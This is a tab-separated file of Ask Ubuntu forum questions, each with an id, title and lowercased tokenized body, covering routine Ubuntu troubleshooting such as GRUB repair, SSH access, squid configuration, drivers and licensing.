clutter the unity dock with 30 launchers either , i 'd prefer to use the dock only for window-switching . this is the launcher contents : [ desktop entry ] name=bitly comment=url shortener with ability to save links icon=/abode/sync-private/local/aux/icons/bitly-128.png type=application terminal=false hidden=false exec=/usr/bin/chromium-browser -- user-data-dir=/abode/sync-private/local/aux/ssb-profiles-chromium/misc-profiles/bitly -- app=http : //bit.ly # next line is experimental , required hacking in /etc/xdg/menus/applications.menu ( ? ) categories=ssb ; # version=1.0 # genericname=url shortener version and genericname are commented out since they seemed to have no impact . this is a screenshot of the bitly app opened via the dash , with the resulting independent dock icon . also shown is the indicator menu , which will not yield an independent icon : everything above also happens with mozilla prism as well .
88274	how can i make smaller pop-ups on lubuntu ?	i want to see smaller pop-ups but where have i to go to configure this ?
88278	libreoffice displays the content of .docx files differently	guys this is getting really annoying , i installed windows 7 alongside ubuntu 11.10 just to use the office . each time i want to write a document i reboot into windows 7 . it 's all because of the formatting i get when i write files in .docx using libreoffice . i tried everything that came to my mind , from resizing the page width and length , to changing the fonts and sizes . i always get a different formatting . for example , i get spaces where i did not put spaces ... the formatting is just different it looks so different than how it looks in microsoft word 2010 . i do n't want to install word using wine because when i used it back then on ubuntu it used to crash and caused me a lot of trouble . and the most clear formatting error i get is with numbering . for example , i wrote : 1. anything 2. whatever when i save the file then reopen it in word i get : 1.1.1. anything 1.1.2. whatever then when i go back to libreoffice it stays : 1.1.1. anything 1.1.2. whatever i 've searched everywhere but i could n't find any solution . i hope this is easy to fix and i do n't get it how no one experienced this before .
88279	how can i watch .asx videos with firefox ?	i want to watch this film . i 'm using ubuntu 11.10 on a laptop and firefox 8.0 . the video does n't play in the browser , and i ca n't use the 'copy ' feature in the player ( i think the built in player of firefos is used ) . what can i do to watch this ?
88280	nautilus now has small icon and only one window	i run ubuntu 10.10 . at first , icons in nautilus got smaller and zoom did n't work . then when i started again it opens in only one window and lost his selections in `` view '' . to show what i mean here is the screen shot : last time i installed php-gtk and all sorts of libraries that is needed for that and was working fine , but the next time i turn on computer i got this nautilus behaviour and bluetooth icon in panel which i removed long time ago . when i do sudo nautilus it opens fine except icons which are still smaller than before . it opens with this message : initializing nautilus-image-converter extension initializing nautilus-gdu extension ** ( nautilus:8100 ) : warning ** : failed to get the current ck session : gdbus.error : org.freedesktop.consolekit.manager.generalerror : unable to lookup session information for process '8100' ( nautilus:8100 ) : gconf-critical ** : gconf_value_free : assertion `value ! = null ' failed nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . ( nautilus:8100 ) : gconf-critical ** : gconf_value_free : assertion `value ! = null ' failed ( nautilus:8100 ) : gconf-critical ** : gconf_value_free : assertion `value ! = null ' failed ( nautilus:8100 ) : gconf-critical ** : gconf_value_free : assertion `value ! = null ' failed ( nautilus:8100 ) : gconf-critical ** : gconf_value_free : assertion `value ! = null ' failed ( nautilus:8100 ) : gconf-critical ** : gconf_value_free : assertion `value ! = null ' failed ( nautilus:8100 ) : gconf-critical ** : gconf_value_free : assertion `value ! = null ' failed ( nautilus:8100 ) : gconf-critical ** : gconf_value_free : assertion `value ! = null ' failed nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . how can i get back to the old nautilus ?
88283	how can i dual boot windows and linux on separate drives ?	i am trying to dual boot vista and ubuntu 11:10 using separate drives . how do i configure grub2 to recognize both installations ?
88286	make a backport for a 32 bit system using prevu on a 64 bit system	i want to make a backport of a package ( in my case luakit ) on my 64 bit machine ( ubuntu natty ) for a 32 bit machine ( ubuntu jaunty ) using prevu . what are the detailed steps to do this ?
88287	timeout during install on an acer aspire 5742g	i bought a new laptop and wanted to install ubuntu 11.10 64bit on it , but it always ends in a timeout . memory test was okay . but it wo n't install or boot the graphical interface . the usb stick is brand new . no it has no connection to the internet . intel core i3 nvidia geforce gt520m 4gb ddr3 ram 320 gb
88291	how do you get sound working on a windows 7 guest os in kvm on ubuntu 11.10 ?	i have ubuntu 11.10 installed on my work laptop . i have a windows 7 ( 32 bit ) guest os installed using virt-manager . everything works fine , except sound . ac97 hardware is configured in the guest os virt-manager profile and windows sees ac97 as the hardware in the guest os when it is running . if you run audio tests in windows , it acts like it is working . i just do n't hear anything coming out of the speakers . someone has to have been able to get windows sound ( in a guest os under kvm with the qemu emulator running ) . please share how you did it .
88292	`` your authentication attempt was unsuccessful . '' error after upgrading to 11.10	i just updated to ubuntu 11.10 and am getting `` your authentication attempt was unsuccessful . '' i am the only user and am the administrator , during login on my keyring i set to logon automatically , but it still askes me for my password . so i put in my old one and it works . but when i go to install apps it asks again and nothing works ! also if i go to user accounts and try to unlock or change my password it wo n't let me ! it says under password `` none '' so what 's going on ? ! i 'm new to ubuntu ! help !
88294	ssh fails because port 22 does n't work with at & t uverse	i am attempting to ssh into my home laptop ( lappy ) from my work laptop ( lappy2 ) so i can run things , transfer files , feel good about having the skillz necessary to set up a server , etc . i have told my at & t uverse 2wire router ( 3801hgv ) to open port 22 , and it 's showing that port 22 is open . i have tried ssh user @ routerip , ssh user @ routerip:22 , ssh user @ lappyip , and ssh user @ lappyip:22 , replacing all the relevant words with my real credentials of course . none of these things worked . when i go to http : //canyouseeme.org/ , no ports appear to be open at all . i checked 22 , 25 , 80 , and a few others . lastly , i have tried the instructions here with a middle computer ( hpc ) that i use at work , and this did n't work either . for the record , lappy and lappy2 can both connect to hpc from anywhere i have internet access . is there anything else i can try ? thanks .
88297	launcher flyout , how do i change it ?	the one thing that 's starting to drive me mad with ubuntu is the launcher on the left side of the screen , i think it looks just pain and ulgy and anytime i want to use a button or back on my browser the launcher flyout and gets in the way . i ca n't find anyway to customise it or control it 's actions . as much as i love using ubuntu unless i can change the way it works , i 'll be looking for an alternative distro it 's gotten so bad . please can anyone give me some advice on how to make my experience more enjoyable .
88319	server getting error after doing distro upgrade : tg3_stop_block timed out	im running ubuntu on a hp server blade proliant bl25p g1 after doing distro upgrade to oneiric im geting dpammed whit these messages on terminal . if i turn of the eth0 interface with sudo ifconfig eth0 downi can se what i write . this is what is at end of my dmesg and if i start in recovery mode i get this message if i reboot the mashine in older kernel it works just fine , any suggjestion how i can fix this ?
88321	can i get external monitors connected to docking station to work with my lenovo t420s ?	i have a new lenovo t420s with nvidia 4200m + intel hd 3000 graphics cards . when i attach the laptop and monitors to the docking station , nothing happens - the monitors are not recognized . what i have tried that did not work : all variations of the display settings in bios ( dedicated , optimus , integrated ) installing proprietary drivers then , i installed nvidia settings and ran sudo nvidia-xconfig after which i had to remove /etc/x11/xorg-config before x would work again . using a vga cord ( ubuntu recognized monitor but did not send any video there ) removing proprietary nvidia drivers reinstalling ubuntu using unity 2d and xfce i have googled quite a bit with little success . i have been told by it to install windows 7 and use ubuntu as a vm . what are my other options ?
88325	where do browsers keep temporary files ?	how do i get in to my temp internet files ? in running ubuntu 11.10 on an hp laptop i normally use chromium but still have fire fox installed
88327	how do i keep geany 's versions updated after installing it in my system ?	when will geany 0.21 be in the repos , instead of geany 0.20 ? whose responsibility is it , ubuntu or geany ? i was n't sure of where i could get packages information , so i just used ask ubuntu .
88336	difference between emacs metapackage and emacs	i have the following sources enabled : main , universe , restricted and multiverse . on ubuntu software center on 11.10 i see two packages for emacs : the gnu emacs editor ( metapackage ) the gnu emacs editor what is the difference between metapackage version and non-metapackage one ? by the way , this thread what differences are there between the various version of emacs available ? also explains the difference between two emacs versions : emacs and emacs-snapshot , and interestingly i do n't see these packages now on my ubuntu software center .
88339	how do i set the refresh time in gwibber to one second ?	does ubuntu 11.10 use the new version of gwibber ? then why is that feature ( to write to all the accounts i have at the same time ) not available ? can someone help to bring it back ? more importantly , how can i set the refresh time in gwibber to 1 second ?
88340	gdevilspie fails to launch , what to do ?	when launched from terminal : -- - : ~ $ gdevilspie pygtk is not correctly installed , exiting . installed in 11.10 using ubuntu software center ...
88343	restricting access to sites	i 'm having some problems configuring my local proxy server so that it would restrict access to certain websites . the proxy server i 'm using is squid ; i edited its configuration file found in /etc/squid/squid.conf to include the following : acl wikipedia dstdomain .wikipedia.org http_access deny wikipedia i tried to redirect elinks to use squid . according to squid 's config file , it listens to port 3128 , so in /etc/elinks/elinks.conf i added the following : set protocol.http.proxy.host = `` localhost:3128 '' i also restarted squid with sudo /etc/init.d/squid restart , but i can still access the banned websites using elinks . what did i do wrong ?
88346	running transmission depending on which wi-fi you are connected to	i wish to set up transmission so that it always runs on my home wi-fi network , but does not when i 'm connected to any other networks . is there a way to set things up so that this is the case ? thank you .
88347	how can i type ascii characters like alt + numpad in windows ?	on windows , the key combination alt + 2+ 5+ 5 creates a blank space . how can i achieve this on ubuntu ?
88350	installing the most recent version of the z shell	the latest release version of zsh is 4.3.14 . i was wondering what is the easiest way to install it on ubuntu . is there a ppa for it ? also , is there a site that lists or collects ubuntu ppa 's for generic packages ?
88356	changing ownership of home folders	okay , so i have a bit of a self-created problem . we were running out of space for svn , so i moved our home folders to a new ( much bigger ) partition . this seemed to work fine at first , and svn itself seems to be working no problem , as do file shares and so on ... except i can no longer log in to gnome . when i log in , i get a message telling me .dmrc ca n't be locked , and that the home folder must be owned by the user with 644 permissions . that sounds straightforward enough , so i log into an the fail-safe terminal to fix it . logging in , i can see that the home folders are owned by root now ( i assume this was a by-product of when i copied them ) . for some reason though , changing the owner with chown always tells me it 's an invalid operation . even if i use sudo i get that message . i 've tried changing both ownership and permission on these folders and neither is working for me . help ? i 'm trying this : sudo chown -r username /home/username
88360	is there any quick previewer for .doc/.docx files ?	i 'd like to know if there 's any alternative for previewing these kind of filetypes without having to open libreoffice . i do n't mean the little thumbnail that appears on nautilus . i mean a basic , simple viewer , just as image viewer is to gimp image editor .
88362	how to make phillips saa713x tv tuner card work ?	i 'm new to ubuntu and have installed ubuntu 10.10 . i have a phillips saa713x pci tv tuner card . please help me to get it to work in ubuntu . i dont know any linux commands . the output of lspci is 00:00.0 host bridge : ati technologies inc radeon xpress 200 host bridge ( rev 01 ) 00:01.0 pci bridge : ati technologies inc rs480 pci bridge 00:11.0 ide interface : ati technologies inc ixp sb400 serial ata controller ( rev 80 ) 0 0:12.0 ide interface : ati technologies inc ixp sb400 serial ata controller ( rev 80 ) 00:13.0 usb controller : ati technologies inc ixp sb400 usb host controller ( rev 80 ) 00:13.1 usb controller : ati technologies inc ixp sb400 usb host controller ( rev 80 ) 00:13.2 usb controller : ati technologies inc ixp sb400 usb2 host controller ( rev 80 ) 00:14.0 smbus : ati technologies inc ixp sb400 smbus controller ( rev 82 ) 00:14.1 ide interface : ati technologies inc ixp sb400 ide controller ( rev 80 ) 00:14.2 audio device : ati technologies inc ixp sb4x0 high definition audio controller ( rev 01 ) 00:14.3 isa bridge : ati technologies inc ixp sb400 pci-isa bridge ( rev 80 ) 00:14.4 pci bridge : ati technologies inc ixp sb400 pci-pci bridge ( rev 80 ) 01:05.0 vga compatible controller : ati technologies inc rc410 [ radeon xpress 200 ] 02:02.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) 02:03.0 multimedia controller : philips semiconductors saa7130 video broadcast decoder ( rev 01 )
88366	what is the legal status of libraries in ubuntu ?	i can not find a good source of information in regard to the legal status of some libraries and applications in ubuntu 11.10 , and i am hoping to find some answers here . firstly , it seems ubuntu includes libjasper1 by default , the legal status of which in the united states , as i understand it , may not be in the clear , as jpeg-2000 may not be free to distribute . what is the story here ? if the u.s. cracks down on software patent infringement , will this affect ubuntu deployments in the u.s. ? i really do n't care about people 's opinions on the legitimacy of such laws , nor do i want any advice to the effect that i should ignore them . i want a straight answer about reality as it is now . secondly , even when you disable multiverse , software like audacity and inkscape are still available , i guess in universe , and can easily be installed along with legally questionable dependencies . audacity should not be packaged with mp3 import support by default in ubuntu , but it is , having libmp3lame and libmad0 as dependencies , which encodes and decodes mp3 . my understanding is that even decoding mp3 is not legal in the united states and japan among others . inkscape requires imagemagick , which also includes jpeg-2000 support . thus , perhaps there are packages that should be in multiverse that are not . certainly audacity 's libmad0 is a functioning mp3 decoder that is not exclusively in multiverse , and libmp3lame ( which i believe allows encoding ) is also easily available with multiverse disabled , and are also unnecessary dependencies for audacity . fedora , for example , just builds audacity without mp3 support . furthermore , libjasper1 is a dependency of nearly everything in the default ubuntu system , which is odd . it seems that you can not open or save .jp2 files in imageviewer . anyhow , i need to know what the legal status of these libraries and programs are so that i can safely install ubuntu and travel with ubuntu . i hope to get an answer soon .
88368	how to play civilization 5 on ubuntu 11.10 ?	i have a 295 gtx video card from nvidia with 1700 mb of video memory , my proc is a amd 1100 hexcore clocked at 3.2 ghz and i have 4 gb of ram . i dual boot my machine with windows 7 . i have been using ubuntu more now that 11.10 came out i 'm still learning the ins and outs i have seen that people play civ 5 on ubuntu i believe i have the right hardware but i just hope some one can help me with installing my favorite gam i do n't want to go to win 7 just to play my game i do n't want to run win 7 in virtual box . so if there is another way to play my game let me know . i installed playonlinux on my ubuntu 11.10 machine . how do i use the thing ?
88371	apt/synaptic needs to reinstall package but ca n't find the archive for it .	running synaptic i get the following error message : e : the package hl1440lpr needs to be reinstalled , but i ca n't find an archive for it . e : internal error opening cache ( 1 ) . please report . upon accepting the message , synaptic quits .
88378	update manager fails to update - badsig errors displayed in synaptic	update manager claiming that i did't check for updates but i do ? the system is telling me that i did not check for update ( last time 20 days ago ) but i did a minute ago.. i 'm using gnome shell ( installed kde and gnome ) here the synaptic output w : gpg error : http : //sd.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/release w : some index files failed to download . they have been ignored , or old ones used instead . thank you in advance ...
88380	schooltool - how do i set up server ?	i am running ubuntu 11.10 . gnome 3.2 . schooltool 1:1.7 . when i go to localhost:7080 and log in as administrator , there is no 'server ' menu , no school menu - as discussed in the documentation http : //book.schooltool.org/server-settings.html . what do i need to do to get that menu ? i have installed the schooltool from the ubuntu software centre . thanks in advance .
88383	mouse does not respond	i 've installed ubuntu 11.10 on a desktop computer , but it does not despond to any kind of mouse . the mouse seems to be on , but the system does n't respond not to the mouse movement nor to mouse clicks . what can i do ? edit : all usbs are not working , not mice and not doks
88384	how can i repair grub ? ( how to get ubuntu back after installing windows ? )	i installed windows 7 , which ate ubuntu 's boot file . when starting up the computer , it now goes straight to windows , without giving me the option of booting ubuntu . how can i get ubuntu back ?
88385	screen resolution is just in 640x480 ?	i tried to change it in displays but the result is unknown and there is no drop down arrow . what should i do ?
88386	disable automatic monitor configuration	currently i have three monitors configured in an amd eyefinity setup with the radeon hd 6670 , which works well . unfortunately , whenever one of monitors enters standby mode ( or is turned off ) my other monitors enter cloned desktop mode , and have to be reconfigured to my one large desktop setup in amdcccle . since i need to be able to turn off my monitors to get rid of the annoying blinking blue lights , i ca n't avoid the monitors being removed from my display setup . i 've also noticed that if i turn off all of my monitors , xorg will use 100 % of my cpu , and will become unresponsive ( even to the point where i can not kill it ) . the only way to unlock my machine is to reboot . is it possible to disable automatic monitor detection so that changes are not made when monitors become unavailable to the system ?
88391	what 's an upper 't ' at the end of unix permissions ?	what 's that 't ' in the permissions mean , and how does it work ? is it related to this 'sticky bit ' thing i 've heard about but never quite understood ?
88395	how do i get a udtt704d usb tv tuner working ?	i am a new linux user . i have an udtt704d usb tv tuner but i ca n't watch tv on my ubuntu install . i have tried several different viewers like kaffeine and mythtv but they do n't identify my tuner . lsusb says the tuner is connected . what should i do if i want to use my tuner card in ubuntu ? thanks in advance . os : ubuntu 11.10 64 bit kernel : linux 3.0.0-14-generic gnome : 3.2.1 output of lsusb : bus 001 device 002 : id 13d3:3213 imc networks dtv-dvb udtt704d - dvbt/ntsc/pal driver ( pcm4 ) output of hwinfo -- usb -- short : unknown : dvb 704dtvbęx
88398	how to convert an application to .deb	i have downloaded an application from here http : //projects.gnome.org/postr/ and extracted it on my desktop it runs fine if i go to the downloaded directory and run as sudo ./postr i want to add this to context menu , application menu how can i do so.this is not a .deb file how can i convert it to .deb ?
88399	possible to mangle bash scripts ?	is it possible to mangle a bash script such that it becomes unreadable by any human ? if so , can it be de-mangled ? or , can i view what commands are being executed when i run the script ?
88401	need pointer to make simple oss volume manager	i can not get my alsa or pulseaudio get working for my headphone sound . so for last 2-3 distros , i am using oss . but problem is , with the introduction of unity panel ( which i could not get it work with oss ) , i find common task like reducing or increasing the volume very difficult . therefore , i would like to create simple volume manager applet which would be simple enough to do following task : slider for volume up & down can reside in upper panel ( for gnome3 and unity ) volume up or down upon mouse wheel action . i do not have lot of interaction with python but i know c , c++ . so is there any already available applet/volume manager which works with 11.10 and can satisfy above requirement . i am planning to just replace appropriate code to get it compatible with oss . any help would be appreciated . note : i know we can get pulseaudio to work with oss , but i do not want to do that . rather , for my programming hobby , would like to create this applet/manager .
88403	how to list all my packages from command line which can show package name , license , source url , etc ?	how to get all the installed package list with there license , source url ? such as following only shows name of the package only . $ dpkg -- get-selections acpi-support install acpid install adduser install adium-theme-ubuntu install aisleriot install alacarte install for example in fedora/centos ( red hat linux branch ) , you can see that : $ yum info busybox loaded plugins : auto-update-debuginfo , langpacks , presto , refresh-packagekit available packages name : busybox arch : i686 epoch : 1 version : 1.18.2 release : 5.fc15 size : 615 k repo : updates summary : statically linked binary providing simplified versions of system commands url : http : //www.busybox.net license : gplv2 description : busybox is a single binary which includes versions of a large number : of system commands , including a shell . this package can be very : useful for recovering from certain types of system failures , : particularly those involving broken shared libraries . follow up : /var/lib/apt/lists $ ls extras.ubuntu.com_ubuntu_dists_natty_main_binary-amd64_packages extras.ubuntu.com_ubuntu_dists_natty_main_source_sources extras.ubuntu.com_ubuntu_dists_natty_release extras.ubuntu.com_ubuntu_dists_natty_release.gpg lock partial security.ubuntu.com_ubuntu_dists_natty-security_main_binary-amd64_packages security.ubuntu.com_ubuntu_dists_natty-security_main_source_sources security.ubuntu.com_ubuntu_dists_natty-security_multiverse_binary-amd64_packages security.ubuntu.com_ubuntu_dists_natty-security_multiverse_source_sources security.ubuntu.com_ubuntu_dists_natty-security_release security.ubuntu.com_ubuntu_dists_natty-security_release.gpg security.ubuntu.com_ubuntu_dists_natty-security_restricted_binary-amd64_packages security.ubuntu.com_ubuntu_dists_natty-security_restricted_source_sources security.ubuntu.com_ubuntu_dists_natty-security_universe_binary-amd64_packages security.ubuntu.com_ubuntu_dists_natty-security_universe_source_sources us.archive.ubuntu.com_ubuntu_dists_natty_main_binary-amd64_packages us.archive.ubuntu.com_ubuntu_dists_natty_main_source_sources us.archive.ubuntu.com_ubuntu_dists_natty_multiverse_binary-amd64_packages us.archive.ubuntu.com_ubuntu_dists_natty_multiverse_source_sources us.archive.ubuntu.com_ubuntu_dists_natty_release us.archive.ubuntu.com_ubuntu_dists_natty_release.gpg us.archive.ubuntu.com_ubuntu_dists_natty_restricted_binary-amd64_packages us.archive.ubuntu.com_ubuntu_dists_natty_restricted_source_sources us.archive.ubuntu.com_ubuntu_dists_natty_universe_binary-amd64_packages us.archive.ubuntu.com_ubuntu_dists_natty_universe_source_sources us.archive.ubuntu.com_ubuntu_dists_natty-updates_main_binary-amd64_packages us.archive.ubuntu.com_ubuntu_dists_natty-updates_main_source_sources us.archive.ubuntu.com_ubuntu_dists_natty-updates_multiverse_binary-amd64_packages us.archive.ubuntu.com_ubuntu_dists_natty-updates_multiverse_source_sources us.archive.ubuntu.com_ubuntu_dists_natty-updates_release us.archive.ubuntu.com_ubuntu_dists_natty-updates_release.gpg us.archive.ubuntu.com_ubuntu_dists_natty-updates_restricted_binary-amd64_packages us.archive.ubuntu.com_ubuntu_dists_natty-updates_restricted_source_sources us.archive.ubuntu.com_ubuntu_dists_natty-updates_universe_binary-amd64_packages us.archive.ubuntu.com_ubuntu_dists_natty-updates_universe_source_sources
88409	flashplayer plugin does not connect to audio streams	alsa plug-in [ np-viewer ] is up and working . any idea ?
88411	how to configure firewall for home pc	firstly , for a home pc , behind a router isit important to install/configure a firewall ? if so , how do i do it ? i have lamp-server installed as i 'm a web developer . i may want my other pc 's on lan to access my files or web pages , ssh in ( maybe in the future ) , but not from outside . how can i configure this ? from work , i learnt that i keep blocking myself all the time , also denyhosts is useful for bruteforce hacking . but problem is i am not a system admin so i keep blocking myself ( including others ) instead . maybe gufw + denyhosts maybe a good start
88422	how to host my commercial application in ubuntu software center ?	i’ve checked the ubuntu software center for hosting my commercial ( closed source ) app . it appears that the store does not have any drm support , to protect against copying the bought application to other pcs . this may be ok , because i have my own license key generation mechanism . the problem is that my license key generation is not microsoft-like , i can not pre-generate a bunch of keys in advance , because the key stores the user name and other data within it . the question is how to integrate my license key mechanism with your store ? as a fallback , can i host my app as “free” instead because it has lite/trial mode when installed without the license key ? any other idea to resolve the issue ?
88423	unable to install on a samsung 305v5a	have used ubuntu for years now . bought a samsung 305v5a-so2 laptop yesterday . it runs an amd a8 quadcore . i have a cd of 10.04 and as i am not clear about whether to install 32 or 64 bit i thought i would run the trial of ubuntu from the cd to see it . after about 30m started getting authentification failure messages . squashfs-error unable to read fragment cash entry then a zillion buffer logical error messages like 17,000+ should i go download 11.10 , in 32bit or go and try the 64bit . really do n't want to screw the new laptop already but aint gon na wan na work with w7 either . thanks for any help
88424	what features/problems should i look for before writing snapshotting support in a backup tool ?	i am currently using ubuntu 11.10 , it had deja dup pre-installed on the system , its a backup and restore utility , but it does n't support snapshots . there is no such tool for snapshotting in ubuntu . i know that taking snapshots requires filesystem support , are there any other problems associated ? i would like to know this . i want to write a system backup and restore utility which could have continuous backup so i want to know if any already exists .
88429	how does the desktop environment affect css structures ?	i did n't actually know whether to ask here or on the main stackoverflow page , but since this is a linux-specific question here goes : i have recently installed lxde as an alternative to the unity desktop environment . i mainly use it for web design/development . i was surprised to see that some css3 selectors ( such as nth-of-type ( n ) ) do not render properly in chromium while using the lxde , whereas they render perfectly well in the same install in a gnome 2 fallback or unity session , or even in the lxde session on firefox . my question is how does the desktop environment affect css default values , and if there is a way to tackle this problem ( a more thorough css universal reset comes to mind , but i 'm not sure yet )
88431	unable to connect to wi-fi , curious problem	i recently retrieved my laptop back from the shop for a hardware issue ( problematic screen ) . i discovered that i am now unable to connect to my wireless network at home . the wireless network appears and registers that i am connected , but am unable to connect to the internet ( webpage is not available ) . other computers are able to connect no problem ( my old powerbook for example ) . now what is curious about this issue is that when i plug the ethernet cable into the laptop , i 'm able to connect via wired and the wireless network . in that , after i connect to the wired connection and switch to the wireless , and unplug the ethernet cable , i 'm suddenly able to surf the net no problem via wifi . once i restart the computer , however , the problem resurfaces and if i want to connect via wifi , i have to do the aforementioned solution over again . i tried a number of things : updating and upgrading from 11.04 to 11.10 and reinstalling my wireless driver . neither of these things resolved the issue . someone please help ! clearly i 'm not the most technologically savvy , but am willing to stretch my mind a bit to try to resolve this finicky issue .
88437	trying to use ffmpeg filters to seperate the i-frames from a video	i am trying to use the `` select '' option in the video filters of libavfilter to seperate the i-frames from a video . but i am not sure why ubuntu 11.10 is not recognizing the filters . i installed every thing , i can see filters and all options inside the filters but i cant use them . instead of -vf or -vfilters , do we need to use any thing . ffmpeg -i in.mp4 -vf select=eq ( pict_type\ , i ) is this the right way ? ? i really appreciate if some one helps me regarding this .
88440	system broken , grub does n't load	i have two laptops with ubuntu 10.04 installed . one of them had a problem ; i was not sure if it was a hardware or software problem . sometimes it would suddenly start working extremely slow ( it needed a few minutes to open an application , such as a terminal window ) and afterward the screen would become grey and inactive . after some time ( 5-10 minutes ) it would start to work normally again . i 've installed ubuntu 11.04 on an external drive . in the beginning it was working fine , but after some time ( quite short ) the same problem began to appear when the computer was running the system installed on the external drive . so i thought it was a hardware problem . yesterday i had to switch off the computer using the power button , since the problem persisted for at least half an hour . since that time the system on the external drive has been completely broken ; when i 'm trying to boot the other computer with the system on the external drive , even grub does n't show up ( even after waiting about 20 minutes ) . when i boot the computer with the internal system , it can see the external drive partitions . i was thinking that maybe that problem was connected with a virus ; i 've scanned the computer where the problem appeared with clamav , and found nothing . thanks for any tips . p.s . the computer in question is acer as 3810t . cpu : intel core ( tm ) 2 solo processor su3500 ( 1.4ghz ) . ram : 3gb ddr . video card : intel graphics media accelerator x4500m hd the external drive is adata hdd nh92 . here are the screenshots showing the use of processor ( on the panel ) and system monitor window ( i 'm not sure , but i think that there is something strange here , on the first screenshot the indicator of the use of processor is all blue and system monitor does n't show bigger use of processor ) : the slowing down does n't happend when i 'm doing something which demands more of processor of memory use . just from time to time . processor speed is set on `` ondemand '' and it 's varying from 800 mhz to 1.4 ghz . update : it seems that it is the memory which is exessively used in the broken computer . the other one ( acer aspire 2920z ; cpu intel premium dual cpu t2370 , 1.73ghz ; ram 2.0 gb ) , while exactly the same applications ( at least the software that i run , i do n't know about background processes ) are in use , uses much less memory - the first one 95 % , the other 60 % . applications used at the moment : two web browsers ( firefox and chrome ) and music player . 2nd update : i have now on the top panel sytem monitor 's indicators of use of cpu , ram , system load ( ? ) and swap . in the moment the system freezes first 3 of them are full ( show 100 % ) . swap stays with the margin use , just few % . when it freezes i 'm not able to check which process is taking most of cpu and memory , since no window works and either the muse coursor is blocked , or it mooves around the screed but does n't make any effect . in the moment it freezed i had only the web browser open , but i was not using my computer at all , i just saw the screen loosing colours . 3rd update since i 've removed antivirus ( clamav ) , the system is no longer freezing , but still it happens ( without any visible reason ) to slow down . i do n't know if the antivirus was the reason ( one of the reasons ) , since i 've removed it i was not using my computer a lot . i 've done memory test by memtest , no errors . quite often in the top of the list of processes using the most cpu is flushplugin-installer . should't i use firefox ? i thought it 's not an application demending a very fast processor ... thanks
88443	is it possible to remove 'contacts ' from gnome shell ?	whenever i search for a program in gnome shell 's search panel , some contacts from pidgin will appear . e.g . when i search for chromium , by typing chr , chris andersen will appear . i do n't want this to happen . is it possible to disable this function ?
88445	`` firmware not ready '' error with a bcm4311	i 've installed ubuntu 11.10 on my laptop ( compaq presario v6000 ) , which has bcm4311 wireless adapter , on the installation screen , it was showing firmware not ready in the network menu , but when i installed with install third-party software , the enable wireless option completely disappeared in the menu . i am using wireless ad-hoc to share my pc 's connection , because my isp does n't allow more than one computer . so i ca n't connect via ethernet to download system updates . any solutions ?
88447	can i use a specific date format for conky ?	i 'm playing with conky and i 'm a chinese user , so my locale of system is something like zh_cn.utf-8 conky seems will use the system api to show the date , but i do n't want conky to show date in chinese , and i really do n't want to change the locale of whole system , so , is there any solution for this ? thanks a lot .
88457	delete old swap partition	i had this old swap partition then i deleted my old ubuntu partition and then installed ubuntu 11.10 but it made another swap partition now i want to identify and delete the old swap partition how to do it ?
88458	how can i make my shell scripts run in a new console automatically ?	hello i am running ubuntu 10.04 and learning the ros ( robot operating system ) which means that i enter quite a lot of shell commands i am currently creating some bash script files to make my work easier , but there are certain commands which must be run in another console . so please tell me what commands i must write in my .sh file so that it can run it 's commands in one window , then start another window in which it run other commands , but from the same .sh file or they could be in different .sh files they just need to run in different consoles .
88462	is it possible to customize the unity sidebar shortcuts to launch applications ?	ok , my question might not be as clear as it should be , exclude my english . it is not my native tongue . what happens : when i press the super key the sidebar appears and when i keep it pressed numbers appear on the icons and if i press them in combination with the super key then the relative application gets loaded or the relative window gets evidenced . unfortunately , this works only up to 0 ( that is , 1 to 9 , then 0 ) together with the s key ( workspace selector ) and t key ( trash ) . what i would like to know how to do , if possible : well , if there are enough icons to get to the 0 then other open windows or icons can not be loaded using the super key . is there a way to change / customize this ? for example , i could use the super key in combination with g to load gedit ( which would be as an icon in the sidebar ) . i hope i 've explained myself well . thanks beforehand .
88464	when i am using ubuntu for commercial reasons , do i have to pay canonical ?	i made application which use ubuntu , when i shift it , i will install ubuntu myself and install application myself as one unit , i can have more unit for selling it all depends based on my marketing and budget . in that case i have to pay to ubuntu ( i was not aware of this before just discovered today and getting confused now ) ? does this mean fedora/archlinux should be the choice if i do not want to pay such ? ubuntu policy says : http : //www.ubuntu.com/aboutus/trademarkpolicy restricted use that requires a trademark licence permission from us is necessary to use any of the trademarks under any circumstances other than those specifically permitted above . these include : any commercial use . oem services http : //www.canonical.com/engineering-services/oem-services/oem-services what will be the price like this service ? or is that not applicable for ubuntu 11.04 ? follow up : that was misunderstanding to me , i am actually using ubuntu as operating system but i fall in to this model , where i just do remix nothing special . derived works . the ability to customise ubuntu to meet your specific needs is one of the great strengths of free software in general , and ubuntu in particular . while we encourage customisation and derivation of ubuntu , we must balance that freedom with the integrity of the trademarks and the quality which they represent . to help reach that balance , we have established the following guidelines and definitions . we recognise and encourage the concept of a âremix.â remixes are derived versions of ubuntu , and it is intended that any software and hardware certifications will apply to a remix . therefore the changes from the official ubuntu product must be minimal to be permitted to use the trademarks . these changes can include configuration changes through the existing ubuntu configuration management tools , changes to artwork and graphical themes and some variance in package selection . in general , a remix can have applications from the ubuntu archives added , or default applications removed , but removing or changing any infrastructure components ( e.g. , shared libraries or desktop components ) will result in changes too large for the resulting product to be called by a trademark . note that if the nature of the product's divergence from ubuntu changes , the remix naming and trademark use may no longer apply .
